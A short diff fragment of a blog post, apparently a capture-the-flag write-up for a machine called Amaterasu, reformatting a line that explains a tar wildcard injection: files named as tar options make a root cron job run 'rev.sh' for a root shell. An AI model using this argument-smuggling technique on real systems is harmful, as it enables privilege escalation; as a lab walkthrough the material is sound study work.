kei5uke/kei5uke.github.io/content/posts/amaterasu/index.md

 [alfredo@fedora restapi]$ echo "" > "--checkpoint=1"
 ```

 And run the commands above.
-These commands are registered as “tar czf /tmp/flask.tar.gz --checkpoint-action=exec=sh [rev.sh](http://rev.sh) --checkpoint=1” when cronjob is executed.
+These commands are registered as `tar czf /tmp/flask.tar.gz --checkpoint-action=exec=sh rev.sh --checkpoint=1` when cronjob is executed.

 # Root shell